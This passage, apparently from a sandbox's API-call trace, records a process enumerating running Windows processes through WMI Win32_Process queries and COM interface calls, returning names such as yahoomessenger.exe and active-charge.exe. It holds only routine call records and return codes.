riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.592] IUnknown:QueryInterface (in: This=0x5eccdd8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.592] IUnknown:QueryInterface (in: This=0x5eccdd8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5eccddc) returned 0x0 [0225.592] IMarshal:GetUnmarshalClass (in: This=0x5eccddc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.592] IUnknown:Release (This=0x5eccddc) returned 0x3 [0225.592] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.592] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.592] IUnknown:QueryInterface (in: This=0x5eccdd8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.593] IUnknown:Release (This=0x5eccdd8) returned 0x2 [0225.593] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.593] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.593] IUnknown:QueryInterface (in: This=0x5eccdd8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5eccdd8) returned 0x0 [0225.593] IUnknown:AddRef (This=0x5eccdd8) returned 0x4 [0225.593] IUnknown:Release (This=0x5eccdd8) returned 0x3 [0225.593] IUnknown:Release (This=0x5eccdd8) returned 0x2 [0225.593] CoTaskMemFree (pv=0x5eca6c8) [0225.593] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.593] IUnknown:AddRef (This=0x5eccdd8) returned 0x3 [0225.593] IWbemClassObject:Get (in: This=0x5eccdd8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.593] IWbemClassObject:Get (in: This=0x5eccdd8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.594] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x66 [0225.594] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x66 [0225.594] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.594] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.594] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.594] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.594] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca6c8) returned 0x0 [0225.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca6c8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.595] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca6c8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2ca8) returned 0x0 [0225.595] WbemDefPath:IUnknown:Release (This=0x5eca6c8) returned 0x0 [0225.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ca8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2ca8) returned 0x0 [0225.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ca8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.595] WbemDefPath:IUnknown:AddRef (This=0x5ec2ca8) returned 0x3 [0225.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ca8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ca8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ca8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca6d8) returned 0x0 [0225.595] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca6d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.595] WbemDefPath:IUnknown:Release (This=0x5eca6d8) returned 0x3 [0225.595] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.596] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.596] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ca8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.596] WbemDefPath:IUnknown:Release (This=0x5ec2ca8) returned 0x2 [0225.596] WbemDefPath:IUnknown:Release (This=0x5ec2ca8) returned 0x1 [0225.596] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.596] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.596] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ca8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2ca8) returned 0x0 [0225.596] WbemDefPath:IUnknown:AddRef (This=0x5ec2ca8) returned 0x3 [0225.596] WbemDefPath:IUnknown:Release (This=0x5ec2ca8) returned 0x2 [0225.596] WbemDefPath:IWbemPath:SetText (This=0x5ec2ca8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2360\"") returned 0x0 [0225.596] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.596] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.596] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.596] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.596] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.596] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.596] IWbemClassObject:Get (in: This=0x5eccdd8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f9f50*=0, plFlavor=0x26f9f54*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x26f9f50*=8, plFlavor=0x26f9f54*=0) returned 0x0 [0225.596] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0225.596] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0225.596] IWbemClassObject:Get (in: This=0x5eccdd8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f9f50*=8, plFlavor=0x26f9f54*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x26f9f50*=8, plFlavor=0x26f9f54*=0) returned 0x0 [0225.596] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0225.597] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0225.597] CoTaskMemAlloc (cb=0x4) returned 0x5eca708 [0225.597] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca708, puReturned=0x26dde18 | out: apObjects=0x5eca708*=0x5eccf70, puReturned=0x26dde18*=0x1) returned 0x0 [0225.597] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5eccf70) returned 0x0 [0225.598] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.598] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.598] IUnknown:AddRef (This=0x5eccf70) returned 0x3 [0225.598] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.598] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.598] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5eccf74) returned 0x0 [0225.598] IMarshal:GetUnmarshalClass (in: This=0x5eccf74, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.598] IUnknown:Release (This=0x5eccf74) returned 0x3 [0225.598] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.598] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.598] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.598] IUnknown:Release (This=0x5eccf70) returned 0x2 [0225.598] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.598] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.598] IUnknown:QueryInterface (in: This=0x5eccf70, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5eccf70) returned 0x0 [0225.598] IUnknown:AddRef (This=0x5eccf70) returned 0x4 [0225.598] IUnknown:Release (This=0x5eccf70) returned 0x3 [0225.598] IUnknown:Release (This=0x5eccf70) returned 0x2 [0225.598] CoTaskMemFree (pv=0x5eca708) [0225.599] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.599] IUnknown:AddRef (This=0x5eccf70) returned 0x3 [0225.599] IWbemClassObject:Get (in: This=0x5eccf70, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.599] IWbemClassObject:Get (in: This=0x5eccf70, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1236\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.599] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1236\"") returned 0x66 [0225.599] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1236\"") returned 0x66 [0225.599] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.599] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.599] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.599] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.600] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca708) returned 0x0 [0225.600] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca708, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.600] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca708, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2d88) returned 0x0 [0225.601] WbemDefPath:IUnknown:Release (This=0x5eca708) returned 0x0 [0225.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2d88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2d88) returned 0x0 [0225.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2d88, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.601] WbemDefPath:IUnknown:AddRef (This=0x5ec2d88) returned 0x3 [0225.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2d88, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2d88, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2d88, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca718) returned 0x0 [0225.601] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca718, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.601] WbemDefPath:IUnknown:Release (This=0x5eca718) returned 0x3 [0225.601] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.601] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2d88, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.601] WbemDefPath:IUnknown:Release (This=0x5ec2d88) returned 0x2 [0225.601] WbemDefPath:IUnknown:Release (This=0x5ec2d88) returned 0x1 [0225.601] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.601] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.601] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2d88, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2d88) returned 0x0 [0225.601] WbemDefPath:IUnknown:AddRef (This=0x5ec2d88) returned 0x3 [0225.601] WbemDefPath:IUnknown:Release (This=0x5ec2d88) returned 0x2 [0225.602] WbemDefPath:IWbemPath:SetText (This=0x5ec2d88, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1236\"") returned 0x0 [0225.602] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.602] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.602] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.602] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.602] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.602] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.602] IWbemClassObject:Get (in: This=0x5eccf70, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fa7dc*=0, plFlavor=0x26fa7e0*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x26fa7dc*=8, plFlavor=0x26fa7e0*=0) returned 0x0 [0225.602] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0225.602] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0225.602] IWbemClassObject:Get (in: This=0x5eccf70, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fa7dc*=8, plFlavor=0x26fa7e0*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x26fa7dc*=8, plFlavor=0x26fa7e0*=0) returned 0x0 [0225.602] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0225.602] SysStringByteLen (bstr="active-charge.exe") returned 0x22 